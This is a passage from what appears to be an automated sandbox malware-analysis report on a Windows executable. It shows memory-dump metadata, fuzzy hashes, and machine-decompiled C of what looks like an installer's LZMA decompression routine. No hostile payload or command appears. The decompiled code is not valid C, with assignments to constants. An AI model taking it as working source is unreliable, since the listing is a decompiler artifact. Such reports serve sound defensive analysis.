                  • CreateDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00403212
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.351761699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.351737055.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351795030.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351815930.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351857358.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351889394.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351940694.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_kVijllv0Yl.jbxd
                  Similarity
                  • API ID: Char$Next$CreateDirectoryPrev
                  • String ID: 1033$C:\Users\user\AppData\Local\Temp\
                  • API String ID: 4115351271-3512041753
                  • Opcode ID: 048fde499a06d2c9d784819047d513c4ac368109c0a7a4f8390a920d62fbeaed
                  • Instruction ID: 52f5018bb87fe832e559484150a565c10a299960058697363e648776ae6da385
                  • Opcode Fuzzy Hash: 048fde499a06d2c9d784819047d513c4ac368109c0a7a4f8390a920d62fbeaed
                  • Instruction Fuzzy Hash: 68D0C92164AD3036D551372A3D0AFDF090D9F4272EF21417BF804B50CA5B6C6A8319EF
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00406481 Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                  Download Yara Rule
                  C-Code - Quality: 99%
                  			E00406481() {
				signed int _t530;
				void _t537;
				signed int _t538;
				signed int _t539;
				unsigned short _t569;
				signed int _t579;
				signed int _t607;
				void* _t627;
				signed int _t628;
				signed int _t635;
				signed int* _t643;
				void* _t644;

				L0:
				while(1) {
					L0:
					_t530 =  *(_t644 - 0x30);
					if(_t530 >= 4) {
					}
					 *(_t644 - 0x40) = 6;
					 *(_t644 - 0x7c) = 0x19;
					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
					while(1) {
						L145:
						 *(_t644 - 0x50) = 1;
						 *(_t644 - 0x48) =  *(_t644 - 0x40);
						while(1) {
							L149:
							if( *(_t644 - 0x48) <= 0) {
								goto L155;
							}
							L150:
							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
							 *(_t644 - 0x54) = _t643;
							_t569 =  *_t643;
							_t635 = _t569 & 0x0000ffff;
							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
							if( *(_t644 - 0xc) >= _t607) {
								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
								_t628 = _t627 + 1;
								 *_t643 = _t569 - (_t569 >> 5);
								 *(_t644 - 0x50) = _t628;
							} else {
								 *(_t644 - 0x10) = _t607;
								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
								 *_t643 = (0x800 - _t635 >> 5) + _t569;
							}
							if( *(_t644 - 0x10) >= 0x1000000) {
								L148:
								_t487 = _t644 - 0x48;
								 *_t487 =  *(_t644 - 0x48) - 1;
								L149:
								if( *(_t644 - 0x48) <= 0) {
									goto L155;
								}
								goto L150;
							} else {
								L154:
								L146:
								if( *(_t644 - 0x6c) == 0) {
									L169:
									 *(_t644 - 0x88) = 0x18;
									L170:
									_t579 = 0x22;
									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
									_t539 = 0;
									L172:
									return _t539;
								}
								L147:
								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
								_t484 = _t644 - 0x70;
								 *_t484 =  &(( *(_t644 - 0x70))[1]);
								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
								goto L148;
							}
							L155:
							_t537 =  *(_t644 - 0x7c);
							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
							while(1) {
								L140:
								 *(_t644 - 0x88) = _t537;
								while(1) {
									L1:
									_t538 =  *(_t644 - 0x88);
									if(_t538 > 0x1c) {
										break;
									}
									L2:
									switch( *((intOrPtr*)(_t538 * 4 +  &M004068EF))) {
										case 0:
											L3:
											if( *(_t644 - 0x6c) == 0) {
												goto L170;
											}
											L4:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t538 =  *( *(_t644 - 0x70));
											if(_t538 > 0xe1) {
												goto L171;
											}
											L5:
											_t542 = _t538 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t581);
											_push(9);
											_pop(_t582);
											_t638 = _t542 / _t581;
											_t544 = _t542 % _t581 & 0x000000ff;
											asm("cdq");
											_t633 = _t544 % _t582 & 0x000000ff;
											 *(_t644 - 0x3c) = _t633;
											 *(_t644 - 0x1c) = (1 << _t638) - 1;
											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
											_t641 = (0x300 << _t633 + _t638) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
												L10:
												if(_t641 == 0) {
													L12:
													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t641 = _t641 - 1;
													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
												} while (_t641 != 0);
												goto L12;
											}
											L6:
											if( *(_t644 - 4) != 0) {
												GlobalFree( *(_t644 - 4));
											}
											_t538 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t644 - 4) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L157:
												 *(_t644 - 0x88) = 1;
												goto L170;
											}
											L14:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t45 = _t644 - 0x48;
											 *_t45 =  *(_t644 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t644 - 0x48) < 4) {
												goto L13;
											}
											L16:
											_t550 =  *(_t644 - 0x40);
											if(_t550 ==  *(_t644 - 0x74)) {
												L20:
												 *(_t644 - 0x48) = 5;
												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											L17:
											 *(_t644 - 0x74) = _t550;
											if( *(_t644 - 8) != 0) {
												GlobalFree( *(_t644 - 8));
											}
											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
											 *(_t644 - 8) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
											 *(_t644 - 0x84) = 6;
											 *(_t644 - 0x4c) = _t557;
											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L158:
												 *(_t644 - 0x88) = 3;
												goto L170;
											}
											L22:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											_t67 = _t644 - 0x70;
											 *_t67 =  &(( *(_t644 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L23:
											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
											if( *(_t644 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t559 =  *_t642;
											_t626 = _t559 & 0x0000ffff;
											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
											if( *(_t644 - 0xc) >= _t596) {
												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
												 *(_t644 - 0x40) = 1;
												_t560 = _t559 - (_t559 >> 5);
												__eflags = _t560;
												 *_t642 = _t560;
											} else {
												 *(_t644 - 0x10) = _t596;
												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
												 *_t642 = (0x800 - _t626 >> 5) + _t559;
											}
											if( *(_t644 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t644 - 0x6c) == 0) {
												L168:
												 *(_t644 - 0x88) = 5;
												goto L170;
											}
											L138:
											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L139:
											_t537 =  *(_t644 - 0x84);
											L140:
											 *(_t644 - 0x88) = _t537;
											goto L1;
										case 6:
											L25:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L36:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L26:
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												L35:
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												L32:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											L66:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												L68:
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											L67:
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											L70:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											L73:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											L74:
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											L75:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											L82:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L84:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L83:
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											L85:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L164:
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											L100:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L159:
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											L38:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											L40:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												L45:
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L160:
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											L47:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												L49:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													L53:
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L161:
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											L59:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												L65:
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L165:
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											L110:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											goto L132;
										case 0x12:
											L128:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L131:
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												L132:
												 *(_t644 - 0x54) = _t642;
												goto L133;
											}
											L129:
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											L141:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L143:
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *((intOrPtr*)(__ebp - 0x7c)) = 0x14;
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
											L142:
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											L156:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											while(1) {
												L140:
												 *(_t644 - 0x88) = _t537;
												goto L1;
											}
										case 0x15:
											L91:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											goto L0;
										case 0x17:
											while(1) {
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
										case 0x18:
											goto L146;
										case 0x19:
											L94:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												L98:
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													L166:
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												L121:
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												L122:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											L95:
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												L97:
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													L107:
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
